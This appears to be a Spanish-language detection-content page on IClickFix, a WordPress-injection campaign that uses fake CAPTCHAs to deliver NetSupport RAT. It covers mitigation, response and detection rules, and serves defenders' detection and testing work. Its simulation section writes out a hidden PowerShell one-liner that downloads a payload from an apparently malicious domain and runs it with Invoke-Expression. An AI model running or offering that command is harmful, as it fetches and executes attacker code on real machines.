Conozca IClickFix: un marco de trabajo extendido dirigido a WordPress utilizando la táctica ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El informe perfila IClickFix, un marco de JavaScript malicioso que compromete sitios de WordPress y presenta un CAPTCHA falso al estilo de Cloudflare Turnstile. El señuelo coacciona a los visitantes a ejecutar un comando de PowerShell que descarga e instala NetSupport RAT. La entrega está respaldada por un sistema de distribución de tráfico construido alrededor del acortador de URL YOURLS y un conjunto rotativo de dominios de redireccionamiento. Los investigadores observaron más de 3,800 sitios de WordPress comprometidos que sirvieron esta cadena a nivel mundial desde finales de 2024.
Investigación
Los analistas de Sekoia identificaron la etiqueta de JavaScript inyectado ic-tracker-js en sitios comprometidos, luego reconstruyeron el flujo de redirección a través de múltiples dominios de corta duración. Capturaron el patrón exacto de ejecución de PowerShell utilizado para recuperar la carga final y recuperaron los componentes de NetSupport RAT caídos junto con indicadores de infraestructura C2 asociados.
Mitigación
Monitorear el contenido web para la ic-tracker-js inyección y bloquear dominios maliciosos conocidos, redireccionadores y servicios de enlace corto utilizados en la cadena. En los endpoints, detectar patrones de descarga y ejecución de PowerShell consistentes con el señuelo ClickFix. Añadir cobertura para la creación de archivos del cliente NetSupport y para persistencia a través de Run claves de registro a nivel de usuario.
Respuesta
Cuando aparezcan indicadores, aislar el endpoint, detener el proceso activo de PowerShell y eliminar los binarios de NetSupport junto con cualquier persistencia basada en el registro. Continuar con una triage forense completo para confirmar que el atacante no desplegó implantes adicionales ni estableció rutas de acceso secundarias.
Flujo de Ataque
Detecciones
Descarga o Subida vía Powershell (vía línea de comandos)
Ver
Archivos Sospechosos en Perfil de Usuario Público (vía evento de archivo)
Ver
La Posibilidad de Ejecución a través de Líneas de Comando de PowerShell Ocultas (vía línea de comandos)
Ver
Uso Sospechoso de Invoke-RestMethod (vía powershell)
Ver
Posible Intento de Ejecución del Binario de NetSupport Manager Desde un Directorio Sospechoso (vía creación de procesos)
Ver
Puntos de Persistencia Posibles [ASEPs – Software/Colmena NTUSER] (vía evento de registro)
Ver
IOCs (HashSha256) para detectar: Conozca IClickFix: un marco generalizado que tiene como objetivo WordPress usando la táctica ClickFix
Ver
IOCs (DestinoIP) para detectar: Conozca IClickFix: un marco generalizado que tiene como objetivo WordPress usando la táctica ClickFix
Ver
IOCs (FuenteIP) para detectar: Conozca IClickFix: un marco generalizado que tiene como objetivo WordPress usando la táctica ClickFix
Ver
Detección de Inyección de JavaScript Malicioso de IClickFix [Servidor Web]
Ver
Ejecución de Comando de PowerShell para la Entrega de NetSupport RAT [PowerShell de Windows]
Ver
Ejecución de Simulación
Requisito previo: El chequeo de Telemetría y Línea de Base previo al vuelo debe haber pasado.
-
Narrativa y Comandos de Ataque:
Un adversario que tiene acceso inicial al endpoint desea establecer un punto de apoyo persistente entregando el NetSupport RAT. Para evadir la detección interactiva, lanzan PowerShell en modo oculto sin perfil ni logotipo (
-w hidden -nop -c). Luego usanInvoke‑WebRequest(iwr) para descargar una carga maliciosa en JSON (tytuy.json) que contiene un script de PowerShell para el RAT. El script se escribe en el directorio temporal y se ejecuta a través deInvoke‑Expression. Esta línea de comando exacta coincide con las cadenas que la regla Sigma monitorea. -
Script de Prueba de Regresión:
# Comando en una línea de PowerShell que coincide con la regla de detección $url = 'https://scottvmorton.com/tytuy.json' $out = "$env:TEMPpayload.ps1" powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)" -
Comandos de Limpieza:
# Eliminar la carga descargada y cualquier proceso de PowerShell restante Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force